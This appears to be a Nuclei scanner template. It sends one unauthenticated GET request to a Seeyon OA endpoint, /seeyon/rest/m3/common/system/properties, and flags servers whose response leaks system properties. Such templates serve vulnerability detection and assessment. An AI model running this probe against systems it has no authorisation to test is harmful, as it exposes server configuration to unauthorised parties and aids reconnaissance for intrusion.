id: seeyon-oa-system-properties-infoleak

info:
  name: seeyon-oa-system-properties-infoleak
  author: seeyon
  severity: medium
  tags: seeyon

http:
  - raw:
      - |
        GET /seeyon/rest/m3/common/system/properties HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "m3.")'
          - 'contains(body, "host")'
        condition: and
